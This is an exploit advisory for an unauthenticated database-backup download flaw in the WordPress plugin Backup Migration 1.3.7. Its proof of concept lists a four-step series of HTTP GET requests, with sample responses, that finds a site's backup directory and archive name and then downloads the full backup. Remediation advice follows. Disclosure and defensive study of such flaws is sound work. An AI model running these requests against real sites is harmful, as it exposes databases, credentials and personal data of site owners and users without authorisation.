=============================================================================================================================================
| # Title     : WordPress Plugin Backup Migration 1.3.7 Unauthenticated Database Backup                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/backup-backup/                                                                                |
=============================================================================================================================================

POC : 

Description:
The Backup Migration WordPress plugin (version 1.3.7) allows unauthenticated users to access sensitive backup files, 
potentially exposing the full database and website content. An attacker can retrieve backup archives without authentication.

Impact:
An attacker can:
- Download full database backups.
- Access sensitive configuration and user data.
- Potentially compromise the entire WordPress installation.

Technical Details / Proof of Concept (PoC):

1) Get the version of the plugin:
GET /wp-content/plugins/backup-backup/readme.txt
Response:
--------------------------------------------------------------------------
Stable tag: 1.3.7
--------------------------------------------------------------------------

2) Get the name of the backup directory:
GET /wp-content/backup-migration/config.json
Response:
--------------------------------------------------------------------------
{
  [...],
  "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
  [...],
  "OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups:
GET /wp-content/backup-migration/complete_logs.log
Response:
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download:
GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

Recommendation:
- Restrict access to backup directories via .htaccess or web server configuration.
- Do not store backups in publicly accessible paths.
- Apply authentication checks before serving backup files.
- Update the plugin if a secure version is released by the vendor.


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================